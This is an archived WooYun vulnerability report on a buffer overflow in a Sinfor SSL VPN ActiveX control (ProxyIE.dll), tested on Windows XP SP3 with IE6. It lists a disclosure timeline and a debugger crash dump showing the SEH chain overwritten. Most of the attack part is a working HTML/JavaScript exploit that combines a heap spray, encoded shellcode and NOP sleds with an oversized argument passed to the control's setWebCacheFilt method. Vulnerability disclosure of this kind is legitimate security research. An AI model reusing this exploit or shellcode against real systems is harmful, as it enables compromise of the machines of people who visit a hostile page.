乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-10-21: 细节已通知厂商并且等待厂商处理中 2013-10-24: 厂商已经确认,细节仅向厂商公开 2013-10-27: 细节向第三方安全合作伙伴开放 2013-12-18: 细节向核心白帽子及相关领域专家公开 2013-12-28: 细节向普通白帽子公开 2014-01-07: 细节向实习白帽子公开 2014-01-19: 细节向公众公开
This exploit test on winxp sp3 ie6
名称: CSProxy Class发行者: Sinfor Technologies Co.,Ltd类型: ActiveX 控件版本: 4. 2. 1. 3文件日期: 上次访问日期: 2013年10月21日,0:27类 ID: {53EC2F48-968E-4A42-B99B-9F6571474213}使用计数: 40阻止次数: 0文件: ProxyIE.dll文件夹: C:\Program Files\Sinfor\SSL\ClientComponent
Exception Code: ACCESS_VIOLATIONDisasm: 77BA6F29 MOV [EDI],EDX (msvcrt.dll)Seh Chain:--------------------------------------------------1 41414141 Called From Returns To --------------------------------------------------msvcrt.77BA6F29 41414141 Registers:--------------------------------------------------EIP 77BA6F29EAX 7EFEFEFEEBX 01AD8324 -> 01A714D3ECX 0218148C -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEDX 41414141EDI 00140000 -> 78746341 -> Asc: ActActESI 0018BD94 -> 00030003EBP 0013ECD8 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAESP 0013EB70 -> 0013ECC4Block Disassembly: --------------------------------------------------77BA6F18 JE SHORT 77BA6F8077BA6F1A MOV [EDI],DL77BA6F1C ADD EDI,177BA6F1F TEST ECX,377BA6F25 JNZ SHORT 77BA6F1177BA6F27 JMP SHORT 77BA6F2E77BA6F29 MOV [EDI],EDX <--- CRASH77BA6F2B ADD EDI,477BA6F2E MOV EDX,7EFEFEFF77BA6F33 MOV EAX,[ECX]77BA6F35 ADD EDX,EAX77BA6F37 XOR EAX,FFFFFFFF77BA6F3A XOR EAX,EDX77BA6F3C MOV EDX,[ECX]77BA6F3E ADD ECX,4ArgDump:--------------------------------------------------EBP+8 41414141EBP+12 41414141EBP+16 41414141EBP+20 41414141EBP+24 41414141EBP+28 41414141Stack Dump:--------------------------------------------------13EB70 C4 EC 13 00 22 54 AB 01 C0 EB 13 00 48 00 18 02 [.....T......H...]13EB80 00 00 00 00 98 48 AF 01 41 41 41 41 41 41 41 41 [.....H..........]13EB90 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]13EBA0 41 41 41 41 B0 8D 03 00 01 41 41 41 41 41 41 41 [................]13EBB0 41 41 41 41 00 00 00 00 00 00 00 00 00 00 00 00 [................]
<html><body><object classid="clsid:53EC2F48-968E-4A42-B99B-9F6571474213"id="target"></object> <input type="button" onclick="test()" value="test" /><script>function test(){var shellcode = unescape('%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+'%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+'%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+'%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+'%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+'%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+'%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+'%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e');var nops=unescape('%u9090%u9090');var headersize =20;var slackspace= headersize + shellcode.length; while(nops.length < slackspace) nops+= nops; fillblock= nops.substring(0, slackspace); block= nops.substring(0, nops.length- slackspace); while( block.length+ slackspace<0x50000) block= block+ block+ fillblock; memory=new Array(); for( i=0; i<200; i++) memory[i]= block + shellcode; var buffer=''; for( i=0; i<=300; i++) buffer+=unescape("%0D%0D%0D%0D");target.setWebCacheFilt(1,buffer);}</script></body></html>
危害等级:高
漏洞Rank:12
确认时间:2013-10-24 19:05
暂无